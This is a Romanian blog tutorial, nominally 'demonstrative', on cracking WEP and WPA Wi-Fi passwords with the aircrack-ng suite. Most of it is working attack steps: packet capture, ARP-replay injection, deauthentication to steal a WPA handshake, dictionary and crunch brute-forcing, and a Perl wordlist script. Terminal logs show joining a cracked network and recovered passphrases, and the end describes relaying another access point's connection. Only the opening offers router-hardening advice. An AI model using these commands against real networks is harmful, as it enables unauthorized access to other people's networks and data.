cracking wep/wpa keys wireless

17/02/2011 21 comentarii
Metoda postata in scop demonstrativ!
Vom vedea in urmatoarele randuri ce se poate intampla in cazul in care aveti un router de wireless,iar
acesta nu este configurat bine.
Orice program,sistem operare nu este perfect si nici nu va fi niciodata! In acest domeniu orice creeat are si
o vulnerabilitate (bug).
Pentru a evita aceste neplaceri (in cazul nostru) este indicat sa intrati pe pagina de configurare a ruterului
si sa va schimbati parola,folosind wpa, ci nu wep si in primul rand alegeti o parola greu de ghicit folosind
cifre si litere (mari si mici).
Adresa pentru configurarea routerului difera de la un model la altul. Unul poate sa aibe de
ex: http://192.168.2.1 , http://192.168.0.1 , etcConsultati manualul de utilizare al produsului!
Prin configurarea corecta a router-ului, puteti evita: accesul nepermis unui utilizator de a folosi
conexiunea voastra la internet,acces nepermis la retea (lan),evitarea patrunderii neautorizata in sistem
(pc,laptop,acces dispozitive upnp,etc)
Descriptarea parolei wep se poate face prin mai multe metode.Mai jos vom observa o metoda foarte
simpla utilizand cunoscutul pachet aircrack-ng
- sistem operare : distributie Linux x64 (Ubuntu 10.10 maverick)
- pachet aircrack-ng
Deschidem terminalul ne logam ca root.Instalam pachetul de baza : aircrack-ng
apt-get update && apt-get install aircrack-ng
Folosim :
airodump-ng pentru monitorizare retea si capturare pachete
aireplay-ng pentru injectare frame
aircrack-ng pentru crack wep/wpa key
Inainte de a incepe mergeti cu mausul in bara de control,da-ti clik dreapta pe iconita cu reteaua si debifati
enable networking


1. airodump-ng wlan0

Obervam:
- denumirea retelei wireless : ESSID = WLAN_A8
- puterea semnalului : PWR = -58 (cea ce inseamna ca semnalul este foarte bun).Cu cat cifrele la PWR sunt
mai mici cu atat calitatea semnalului este mai buna, de ex: -58 .Cu cat cifra urca de ex: PWR = -90
calitatea semnalului este foarte proasta.Sunteti la o distanta destul de mare de AP.Atacul spre aceste retele
va fi foarte slow.
-BSSID , adresa de mac a ruterului (AP) .
-CH canalul (in acest caz canalul 6)
-STATION adresa de mac a clientului (pc ,camera wlan,dispozitive wlan)
-Rate calitatea semnalului intre AP si client.
Oprim rularea comenzii airodump-ng (control +c)
Se da urmatoarea linie de comanda:
airodump-ng -w (denumirea fisierului in care se vor afla pachetele capturate) -c (canalul pe care se afla
reteaua) bssid (adresa de mac a routerului ) interfata (Staiile cu plci Atheros vor avea interfaa wireless
wlan0).Interfata o vizualizati ruland comanda airmong-ng sau iwconfig

Obervam legatura dintre BSSID si STATION, cea ce inseamna ca clientul care are adresa de mac la STATION
este conectat la AP. PWR- se comporta foarte bine, la fel si pachetele.Vom alege clientul cu cele mai multe
pachete si cu cele mai putine pierderi.

Dechidem un nou terminal si introducem linia de comanda aireplay-ng pentru injectarea framelor.Aceasta
comanda captureaza pachetele dintre conexiunea AP si PC, oferind cheia wep de care avem nevoie.
Dupa rularea comenzii pe care o vedeti in screenshot-ul din terminal asteptam 2-3 minute
aireplay-ng -3 -e (ESSID) -a (adresa mac AP) -b (adresa mac AP) -h (adresa client conectat la AP) -x 600 -
r (nume fisier capturare pachete) (interfata)


Deschidem din nou un alt terminal, celelalte doua terminale cu comenziile airodump si aireplay, vor
ramane active si vom rula aircrack-ng

aircrack-ng (fisier.cap) sau in cazul mai multor fisiere puteti rula (aircrack-ng *.cap)

In fata la ASCII, aveti afisata parola retelei.



root@linux:~# lspci -nn | grep -i net
02:00.0 Ethernet controller [0200]: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit
Ethernet controller [10ec:8168] (rev 06)
09:00.0 Network controller [0280]: Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-
Express) [168c:002b] (rev 01)
wlan0 Scan completed :
Cell 01 Address: E0:91:53:05:2A:18
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=59/70 Signal level=-51 dBm
Encryption key:on
ESSID:WLAN_A8
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=000000007b0f21e9
Extra: Last beacon: 570ms ago
IE: Unknown: 0007574C414E5F4138
IE: Unknown: 010482848B96
IE: Unknown: 030106
IE: Unknown: 0706455320010D14
IE: Unknown: 2A0100
IE: Unknown: 32080C1218243048606C
IE: Unknown: DD050010910400
root@linux:~# iwconfig wlan0 essid WLAN_A8
root@linux:~# iwconfig wlan0 key s:XE0915304E5A8
root@linux:~# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan0/00:11:22:33:44:55
Sending on LPF/wlan0/00:11:22:33:44:55
Sending on Socket/fallback
DHCPREQUEST of 192.168.1.33 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.33 from 192.168.1.1
bound to 192.168.1.33 renewal in 16724 seconds.
root@linux:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
root@linux:~# ping -c 3 google.ro
PING google.ro (209.85.227.99) 56(84) bytes of data.
64 bytes from wy-in-f99.1e100.net (209.85.227.99): icmp_req=1 ttl=47 time=92.9 ms
64 bytes from wy-in-f99.1e100.net (209.85.227.99): icmp_req=2 ttl=47 time=95.6 ms
64 bytes from wy-in-f99.1e100.net (209.85.227.99): icmp_req=3 ttl=48 time=88.5 ms
google.ro ping statistics
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 88.504/92.347/95.601/2.948 ms
root@linux:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:11:22:33:44:55
inet addr:192.168.1.33 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::211:22ff:fe33:4455/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7972 errors:0 dropped:0 overruns:0 frame:0
TX packets:6742 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:8909851 (8.9 MB) TX bytes:1065318 (1.0 MB)

config router wlan
Cracking WPA

Rulam comanda : airodump-ng wlan0
Observam: adresa de mac a AP, canalul, encriptia : WPA2 , auth:PSK,essid, semnalul (-53)
Inainte interfata a fost pe canalul 6,acum reteaua de wlan care e pe wpa este pe chan. 9.Va trebui sa
shimbam canalul interfetei .
iwconfig (interfata) channel (numar canal)
Rulam linia de comanda airodump-n pe reteaua care ne intereseaza :
airodump-ng -c (canal AP) -w (fisier) bssid (mac AP) (interfata)

Observam conexiunea intre AP (BSSID) si PC (STATION) care joaca un rol foarte important
Deschidem alt terminal si introducem linia de comanda :
aireplay-ng -0 (numar pachete trimise; puteti trimite cate vreti) -a (adresa de mac AP) (interfata)
In urma pachetelor trimise vom sustrage WPA handshake. Fara handshake nu vom rezolva nimic!
Dupa ce avem afisat WPA handshake vom rula in terminal :
aircrack-ng (fisier.cap) -w (dictionarul cu parole)
Daca aveti mai multe fisiere cu .cap rulati aircrack-ng *.cap -w password.lst

Observam in screenshot-ul de mai sus ca parola a fost gasita (pulamea99). Insa parola gasita este preluata
de acel -w password.lst. Aceasta lista contine cuvinte cheie folosite in general ca parole.Puteti imbunatati
dictionarul cu parole,prin completarea acestuia prin editare,introducand cuvintele voastre cheie sau puteti
creea un script pentru generare de cifre si litere, insa sansele de a decripta o cheie wpa,daca aceasta
contine 2-3 cuvinte inventate de voi , sunt foarte mici. Exemplu cheie wpa: CuPtorFrigiderAragaz99. Cu
siguranta nimeni nu va avea acest cuvand in lista cu parole, iar generarea literelor pentru un cuvant cu
minim 8 caractere (cum presupune o cheie wpa) presupune incarcarea spatiului pe hard cu cativa GB buni,
timp de lucru extrem de indelungat pentru generarea a zece milioane de cuvinte (8 carcatere),sistem supra
incarcarcat ,procesoarele ruland timp indelungat la 100 %, resurse foarte multe,etc. Dupa parerea mea
numai unul care nu e om sau are ceva la cap ar fi in stare sa astepte cate 4 zile pentru generarea unui
astfel de dictionar plus un hard extern obligatoriu care cu siguranta trebuie sa sara de 500 gb.
Intr-un final cuvantul acela (pulamea99) daca nu este in dictionar nu poate fi gasit,deci parola nu se va
afla.
Priviti screenshot-ul de mai jos cum arata in cazul in care cheia wpa nu exista in dictionarul cu parole.

Scrie clar : Passphrase not in dictionary
Un generator de cifre se poate creea astfel :
pico script.pl si editatil ca in exemplul de mai jos :

root@linux:~# cat script.pl
#!/usr/bin/perl
$n = 10000000;
while ($n <= 99999999) { system (echo $n >> password.lst); $n++; }
root@linux:~#
Acesta va genera (numara) cifre cuprinse de la 10000000 la 99999999 si le va salva in fisierul
password.lst
Apropo acest fisier password.lst se afla in aircrack-ng suite.Deobicei il puteti gasi in
/usr/share/doc/aircrack-ng/examples sub forma de arhiva zip sau tar.gz. Il puteti copia sau muta de
aici unde vrei voi.
Dupa ce am creeat fisierul script.pl il rulam perl script.pl iar acesta va executa numaratoarea cuprinsa
intre cifrele date de noi.

Rezultat final : cheie wpa gasita.Pentru vizualizare clara a imagini dati clik pe imagine

V-am aratat cum se face un script pt generare de cifre,acum va arat cum se face script-ul pentru generare
de cuvinte
Descarci fisierul generator cuvinte de aici http://mobile-phone.uphero.com/wg.pl
Il dezarhivezi : tar -xvf wg.tar.gz
Il rulezi :
perl ./wg.pl -l 8 -u 64 -v abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
YZ0123456789\`\~\!\@\#\$\%\^\&\*\(\\\_\+\=[]\;\\,.\/\<\>\?\:\\\}\|\ > listacuvinte.txt
La final pentru wpa rulezi : aircrack-ng *.cap -w listacuvinte.txt
-w : dai scurtatura unde se afla dictionarul. Exemplu : aircrack-ng *.cap -w
/home/pulamea/Desktop/listacuvinte.txt
Dictionar de cuvinte incomplet de 62 Gb facut in aproximativ 5 ore:


Se mai poate face un attak prin bruteforce asemanator, format din cifre si numere,fara dictionar,insa va
dura o vesnicie.Daca chiar crezi ca esti in stare sa astepti ore,daca nu chiar zile :) instaleaza crunch
Link download : http://sourceforge.net/projects/crunch-wordlist/
Il dezarhivezi, intrii in director, make apoi lunch
co@linux:~/Desktop$ tar xvf crunch-2.9.tgz
crunch2.9/
crunch2.9/Makefile
crunch2.9/charset.lst
crunch2.9/crunch.1
crunch2.9/crunch.c
crunch2.9/GPL.TXT
co@linux:~/Desktop$ cd crunch2.9/
co@linux:~/Desktop/crunch2.9$ ls
charset.lst crunch.1 crunch.c GPL.TXT Makefile
co@linux:~/Desktop/crunch2.9$ make
Building binary
/usr/bin/gcc -Wall -lm -pthread -std=c99 crunch.c -o crunch
co@linux:~/Desktop/crunch2.9$ ls -la
total 144
drwxr-xr-x 2 co co 200 2011-02-20 12:56 .
drwxr-xr-x 4 co co 136 2011-02-20 12:56 ..
-rw-rr 1 co co 5616 2010-12-05 03:53 charset.lst
-rwxr-xr-x 1 co co 40406 2011-02-20 12:56 crunch
-rw-rr 1 co co 12230 2011-01-06 04:31 crunch.1
-rw-rr 1 co co 58777 2011-01-19 02:41 crunch.c
-rw-rr 1 co co 18092 2010-12-05 03:53 GPL.TXT
-rw-rr 1 co co 2448 2011-01-06 04:31 Makefile
co@linux:~/Desktop/crunch2.9$
./crunch 8 8 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng
/usr/share/doc/aircrack-ng/examples/*.cap -e test -w -
in loc de /usr/share/doc/aircrack-ng/examples/*.cap pui fisierul capturat *.cap din directorul in care ai
rulat aireplay-ng
Daca stii cum incepe parola si exact din cate caractere este formata poti face asa :
./crunch 8 8 -t bisco@@@ 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ |
aircrack-ng *.cap -e test -w -
unde vine -t bisco@@@ inceputul parolei iar @@@ va fi generat
[00:00:25] 13344 keys tested (579.29 k/s)
KEY FOUND! [ biscotte ]
Update amplificare semnal wireless
In cazul in care semnalul de la AP este foarte slab,puteti amplifica semnalul de wlan cu ajutorul unui
router care suporta functie de Wireless ISP,astfel ve-ti avea semnal mai puternic,internet-ul va merge mult
mai bine,etc.Mai jos am atasat cateva screenshoturi in care reprezinta amplificarea semnalului wlan de la
un AP transformat in WLAN ISP (cu ajutorul functie din meniul AP) conectat la alt AP
(clik pe foto pt. marire)







00:11:22:33:44:55 mac-ului ap (wlan isp) fake mac
name AP: unix
unde, unix se conecteaza la alt AP WLAN_E2
in coltul din dreapta sus puteti oberva retele disponibile din zona preluate cu ajutorul AP unix








Obervam : legaturiile dintre AP (wlan isp) si AP (internet), unde de la unix (router) mai am conectate inca 3
pc-uri.Deci am amplificat semnalul cu unix iar de aici mai am net pe inca 3 pc-uri. Schema vine asa :
AP ( WLAN_E2) > AP (unix ; my router) > internet = 3 pc (bssid)








In ultimul screenshot observam in AP (wlan_e2) ca mai sunt conectate inca 2 pc-uri + my AP (unix)